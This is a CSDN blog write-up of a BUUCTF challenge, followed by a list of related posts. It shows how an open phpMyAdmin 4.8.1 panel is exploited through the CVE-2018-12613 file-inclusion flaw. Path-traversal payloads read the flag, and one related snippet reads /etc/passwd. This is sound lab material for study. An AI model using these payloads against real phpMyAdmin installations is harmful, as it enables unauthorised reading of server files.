buuctf-[[GWCTF 2019]我有一个数据库(小宇特详解)

最新推荐文章于 2023-04-03 18:53:49 发布
最新推荐文章于 2023-04-03 18:53:49 发布
阅读量594 收藏 1
点赞数 1
分类专栏: buuctf 文章标签: 数据库 php mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xhy18634297976/article/details/122902544
版权

buuctf-[[GWCTF 2019]我有一个数据库(小宇特详解)

这里不知道什么原因显示的乱码

直接使用dirsearch对网站进行扫描吧

这里扫到了phpmyadmin目录,无密码直接登录成功。

这里给出了版本号MySQL数据库Version 4.8.1。

这个版本有文件包含漏洞

漏洞原理是

利用/使db_datadict.php?成为一个不存在目录,利用include函数的目录不断跳转尝试得到flag目录。

payload

phpmyadmin/index.php?target=db_datadict.php?/../../../../../flag

小宇特详解
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
[GWCTF 2019]我有一个数据库(文件包含漏洞)
weixin_44110537的博客
10-03 407
一堆乱码,什么都没有. 查看源代码也没有什么隐藏信息. 于是dirsearch扫描一下,发现 有个数据库登入页面. 发现不用登录直接就可以进去了. 但是发现这里面什么都没有. cve-2018-12613-PhpMyadmin后台文件包含 这个漏洞出现在index.php中的 // If we have a valid target, let's load that script instead if (! empty($_REQUEST['target']) && is_st.
BUU刷题--[GWCTF 2019]我有一个数据库
weixin_48631429的博客
12-02 553
我有一个数据库 打开看到这样一堆文字,读不懂,也没有其他的信息。 怎么想也想不到该怎么做,buu还不能扫描。所以只能看了wp,看到有一个/phpmyadmin,回来开始想怎么做 phpmyadmin版本信息4.8.1,搜索一下有什么漏洞。 任意文件包含:那么我们就可以利用来读flag ?target=db_datadict.php%253f/../../../../../../../../../flag 拿到flag 考点就是CVE-2018-12613 ...
[GWCTF 2019]我有一个数据库
Yb_140的博客
10-12 548
进行两次编码,两次编码的值就是%253f,第一次url解码是由服务器自动解码的,然后经过urldecode之后变为?截取前面的值,所以前面我们传入一个在白名单里的值。4.不能在 $target_blacklist数组里面(即不能为import.php,export.php)经过 urldecode 函数解码后的 $_page 存在在 $whitelist 中返回 true。如果 $_page 存在在 $whitelist 中返回 true;$page 如果存在在 $whitelist 中返回 true;
[GWCTF 2019]我有一个数据库(CVE-2018-12613)
记录学习,一起进步
01-29 272
[GWCTF 2019]我有一个数据库(CVE-2018-12613)
lua-resty-maxminddb:一个Lua库,用于读取MaxMind的Geolocation数据库
02-03
lua-resty-maxminddb是一个专门针对Lua环境设计的库,它的主要功能是读取和处理MaxMind公司的Geolocation数据库,用于获取IP地址的地理位置信息。这个库在OpenResty(一个基于Nginx和LuaJIT的高性能Web平台)中得到...
django-background-tasks:Django的数据库支持的工作队列
02-05
`django-background-tasks` 是一个用于Django框架的库,它提供了一种简单的方法来处理后台任务,这些任务可以在Web请求之外异步执行。这个库的核心功能是利用数据库作为存储来管理任务队列,使得开发者可以创建、...
ToDoList-Anjani:第一个ToDoList应用
05-11
【标题】"ToDoList-Anjani:第一个ToDoList应用"是一个初学者开发的基于JavaScript的待办事项管理软件。这个项目对于那些想要学习基础前端开发技术的人来说,是一个很好的起点,尤其是对JavaScript感兴趣的新手。 ...
trast-nextjs:下一个JS
03-18
NextJS Material Dashboard是一个免费的Material-UI,NextJS和React Admin,其设计灵感来自Google的Material Design。我们很高兴通过易于使用且美观的组件来介绍我们对材料概念的看法。 NextJS Material Dashboard...
MCW-Migrating-SQL-databases-to-Azure:MCW将SQL数据库迁移到Azure
04-28
该公司成立于2010年,自发布其最受欢迎的游戏系列的第一批产品(包括在线多人游戏)以来,经历了指数式增长。 此后,他们通过在大多数游戏产品组合中增加了在线功能,从而建立了成功的基础。 为了促进在线游戏,...
BUUCTF 我有一个数据库 Mark loves cat
最新发布
wwwwyyyrre的博客
04-03 191
得到flag flag{4281d569-f7c1-4095-91cf-975c2e8a9a2d}这个是4.8.1版本的数据库有漏洞可以利用(CVE-2018-12613)这里利用的就是exit函数里面的三个 handsome yds is来绕过。打开链接 没看到有用的信息 查看源代码也没有什么信息 尝试扫一下后台。这一块的意思是 post传参 输入$x=$y 回显就是$$x=$y。这一块的意思是 get传参 输入$x=$y 回显是$$x=$$y。打开图片是乱码 源代码也没有任何的东西 扫描一下后台。
BUUCTF WEB [GWCTF 2019]我有一个数据库
Y1da的博客
04-27 371
BUUCTF WEB [GWCTF 2019]我有一个数据库 刷新后查看响应包 <!DOCTYPE html> <html> <head> <title>空的数据库</title> </head> <body> <h1>我有一个数据库,但里面什么也没有~</h1> <h1>不信你找</h1> </body> </html> 没有什么其他
[GWCTF 2019]我有一个数据库 WP
weixin_52599204的博客
08-05 891
提示我有一个数据库,但里面什么都没有,于是拿dirsearch跑了一下,没有出结果。那么思路肯定就是复现漏洞了,于是开始找。但是有数据库嘛,那么试试常见的几个加上。看到最多的是文件包含漏洞 编号。最后的payload。...
[GWCTF 2019]我有一个数据库 1
m0_62879498的博客
05-04 2466
[GWCTF 2019]我有一个数据库 1 打开环境 什么都没有 使用dirsearch爆破网站目录,发现了index.php,phpmyadmin, phpinofo以及root.txt 只有phpmyadmin提供了有用信息 我们访问一下 乍一看,感觉是毫无头绪 但,仔细观察 phpmyadmin 的版本信息 在该版本的 phpmyadmin 存在框架代码漏洞 $target_blacklist = array ( 'import.php', 'export.php' ); // If
BUUCTF[GWCTF 2019]我有一个数据库
LSYZWF的博客
10-12 1747
文章目录题目解答漏洞分析知识点 题目 链接:https://buuoj.cn/challenges#[GWCTF%202019]%E6%88%91%E6%9C%89%E4%B8%80%E4%B8%AA%E6%95%B0%E6%8D%AE%E5%BA%93 解答 1、乱码,看不懂 2、F12 同时结合题目可能与数据库有关 3、可以尝试扫描相关数据库的端口是否开放,也可以通过数据库工具进行连接测试,但是这里使用的是phpmyadmin 随便翻阅了一下,得不到有用的东西,也证实了上面什么都没有的说法 4、从
BUU[GWCTF 2019]我有一个数据库
qq_62078839的博客
04-26 1823
打开链接 一堆乱码,查看源代码也没什么信息可提取,利用目录扫描器,看能不能扫出什么东西 扫到了一个phpmyadmin 进去看看 这里的版本号为4.8.1,而phpmyadmin在4.8.0以及4.8.1的版本号中有文件包含漏洞 [PHPMYADMIN]CVE-2018-12613 我们试试读取看是否成功 index.php?target=sql.php?/../../../../../../../../../etc/passwd 成功 尝试读取flag inde...
[GWCTF 2019] web题-我有一个数据库
BROTHERYY的博客
07-30 1766
复现环境:buuoj.cn 我是从题目猜到有phpmyadmin,直接就输入就进去了 看一下版本信息 phpmyadmin4.8.0-4.8.1存在文件包含漏洞 使用网上的payload直接打 ?target=db_datadict.php%253f/../../../../../../../../etc/passwd 能够执行,修改为flag flag{15aa1a13-8298-433c-8139-4ff6a0ffb5d6} ...
Quectel BC20硬件设计手册:NB-IoT/GNSS模组详解
"Quectel_BC20_硬件设计手册_V1.0_Preliminary_...该手册对于那些需要在项目中集成Quectel BC20模块的工程师来说,是一份非常重要的参考资料,它提供了详尽的设计指导和关键参数,帮助确保硬件设计的兼容性和效率。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

小宇特详解

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值